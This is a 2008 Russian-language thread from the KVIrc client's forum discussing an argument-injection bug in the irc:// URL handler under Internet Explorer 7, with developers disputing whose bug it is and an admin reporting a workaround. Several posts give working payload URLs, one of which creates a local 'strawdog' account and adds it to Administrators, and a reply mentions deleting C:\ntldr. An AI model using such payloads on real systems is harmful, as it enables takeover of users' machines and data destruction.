Welcome, Guest. Please login or register.

Login with username, password and session length

 
Advanced search

3 876 Posts in 868 Topics- by 723 Members - Latest Member: tablarock

23 May 2012, 08:27
Select Language English | Russian ru | German
Main PageIRC Client KVIrc forumRussian talksСообщения об ошибках в программеВнимание exploits
« previous next »
Pages: [1] 2
Print
Author Topic: Внимание exploits  (Read 9694 times)
0 Members and 1 Guest are viewing this topic.
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« on: 22 November 2008, 12:35 »
запускаем браузер IE7 пишем в адресную строку
irc:///"%20--nosplash%20-e%20"run%20calc"%20"
получаем калкулатор

можно докуя чего получить Sad если правильно писать

росмотрите парсер строки
Logged
Voker57
Разработчик KVirc
*

Репутация: 9
Posts: 122


View Profile Email
« Reply #1 on: 22 November 2008, 14:22 »
откуда вас столько хацкеров набежало? Это баг в IE, в остальных браузерах такого бардака не происходит.
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #2 on: 22 November 2008, 17:03 »
Это не баг в эксплораре это баг в квирке!!!!!!
она дает возможность запускать всякую херь
а не эксплорер
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #3 on: 22 November 2008, 17:04 »
Мозила пишет что просто тупо не поддерживает протокол IRC
Logged
Voker57
Разработчик KVirc
*

Репутация: 9
Posts: 122


View Profile Email
« Reply #4 on: 22 November 2008, 18:18 »
IOResult, это эксплорер позволяет дописывать в строку всякую херь. Ибо не фильтрует запрещенные символы в URL (в данном случае это кавычка).
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #5 on: 22 November 2008, 19:02 »
Ну так сделай проверку в квирке, раз IE не может

или попробуй это выполнить

ircs6:///"%20--nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"
Logged
kns
Постоялец
***

Репутация: 38
Gender: Male
Posts: 222


View Profile WWW
« Reply #6 on: 22 November 2008, 19:09 »
Непонятно, в чем проблема. Квирк позволяет выполнять команды и это хорошо.
Quote
-e <commands>: If a KVIrc session is already running, execute
                 the <commands> in that session, otherwise start up
                 normally and execute <commands>
                 <commands> must be a single shell token.
                 You can eventually use this switch more than once
  -x <commands>: If a KVIrc session is already running, execute
                 the <commands> in that session, otherwise exit from application without doing anything/
                 <commands> must be a single shell token.
                 You can eventually use this switch more than once
  -r <commands>: If a KVIrc session is already running, execute the <commands>
                 in that session, otherwise start up normally (do not execute).
                 <commands> must be a single shell token.
                 You can eventually use this switch more than once

Если браузер позволяет запускает сторонние приложения с любыми параметрами, то при чем тут квирк?
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #7 on: 22 November 2008, 19:20 »
когда пишете в IE IRC:\\ то квирка берет и начинает парсить строку
вот к примеру она запустит в квирке о программе

ircs6:///"%20--nosplash%20-e%20"about.kvirc"%20"

а до этого было использована функция из KVS run
Logged
Voker57
Разработчик KVirc
*

Репутация: 9
Posts: 122


View Profile Email
« Reply #8 on: 22 November 2008, 19:23 »
набери еще в командной строке del C:\ntldr и потом пиши в майкрософт о баге.
Logged
kns
Постоялец
***

Репутация: 38
Gender: Male
Posts: 222


View Profile WWW
« Reply #9 on: 22 November 2008, 19:24 »
Просто запускается дефолтовый ирц-клиент с этими параметрами. Думаю, в ие можно его изменить/убрать.
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #10 on: 22 November 2008, 19:32 »
а зачем при вводе адреса irc сервера разрешать выполнять кучу всего Sad
Logged
I0Result
Новичок
*

Репутация: -1
Posts: 11


View Profile
« Reply #11 on: 22 November 2008, 19:37 »
мужики лучше закройте эту херь а то в сети уже началось бог знает что :'(
Logged
Voker57
Разработчик KVirc
*

Репутация: 9
Posts: 122


View Profile Email
« Reply #12 on: 22 November 2008, 19:40 »
Quote
а зачем при вводе адреса irc сервера разрешать выполнять кучу всего
Сам удивляюсь. И как таким браузером можно пользоваться?
Quote
мужики лучше закройте эту херь а то в сети уже началось бог знает что
естественный отбор?

Разработчиков IE тут, думаю, нет.
Logged
Alexey
Администратор
*****

Репутация: 45
Posts: 203


View Profile Email
« Reply #13 on: 23 November 2008, 13:47 »
В SVN добавлен workaround для этого бага.

Проблема действительно на стороне IE, но отдуваться за глюки мелкософта, как всегда, приходится окружающим
Logged
Skull
Новичок
*

Репутация: 8
Posts: 42


View Profile
« Reply #14 on: 28 November 2008, 00:09 »
Баг действительно в IE, но чисто для справки, то, как он запускает квирк:
Code:
"X:\KVIrc\kvirc.exe" "irc:///" --nosplash -e "run calc" ""
Хотя на milw0rm.com этот баг добавлен как выполнение команд в KVIrc
Ну и еще немного информации (:
Logged
Pages: [1] 2
Print
« previous next »
Jump to:  

Theme orange-lt created by panic